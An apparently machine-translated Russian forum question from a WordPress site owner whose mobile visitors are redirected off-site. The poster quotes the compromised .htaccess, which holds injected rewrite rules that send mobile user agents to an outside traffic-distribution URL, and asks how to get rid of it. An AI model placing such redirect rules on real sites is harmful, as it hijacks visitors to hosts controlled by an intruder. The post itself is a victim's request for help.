Intereting Posts

Невозможно найти сценарий, перенаправляющий мобильный трафик в собственном веб-сайте WP

Я пытаюсь исправить самостоятельно размещенный сайт WP, в котором используется двадцать двенадцать тем с незначительными настройками (в основном CSS, не много php, все написано предыдущим веб-мастером).

У меня проблемы с доступом к мобильным устройствам . Все они перенаправляются на URI за пределами сайта.

Я уже «перезагрузил» файлы htacces. Они выглядели так:

RewriteEngine On RewriteCond %{HTTP_USER_AGENT} ^1207. (lot of other devices) RewriteCond %{HTTP_ACCEPT} text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml [NC,OR] RewriteCond %{HTTP:HTTP_X_WAP_PROFILE} .+ [OR] RewriteCond %{HTTP:HTTP_PROFILE} .+ [OR] RewriteCond %{HTTP:X-OperaMini-Features} .+ [OR] RewriteCond %{HTTP:UA-pixels} .+ RewriteRule ^(.*)$ http://isupport.x24hr.com/tds/go.php?sid=1 [L,R=302] 

И теперь я заменил его на предлагаемый htaccess в WordPress Codex. Но когда вы пытаетесь подключиться к телефону, он все равно перенаправляется на сайт isupport.x24.com, получая 404 в android и 502 в iOS.

Веб-сайт: www.lagoabeachhostel.com

Как вы можете себе представить, я новичок. Я уже провел много исследований, но все еще не могу разобраться в этом. Мне кажется, что где-то есть сценарий, который я не могу найти.

UPDATE: я установил и запустил плагин Anti-Malware Scan. Он получил .htaccess как возможную угрозу. Открыв его, я увидел, что файл .htaccess, который анализировал плагин, по-прежнему остается старым, что означает, что тот, который я загрузил с помощью ftp, не вступил в силу, объясняя, почему сервер все еще перенаправляет мобильный трафик. Любая идея, почему это происходит? Как я могу эффективно изменить файл .htaccess?

ты можешь помочь мне с этим? Я бы очень признателен!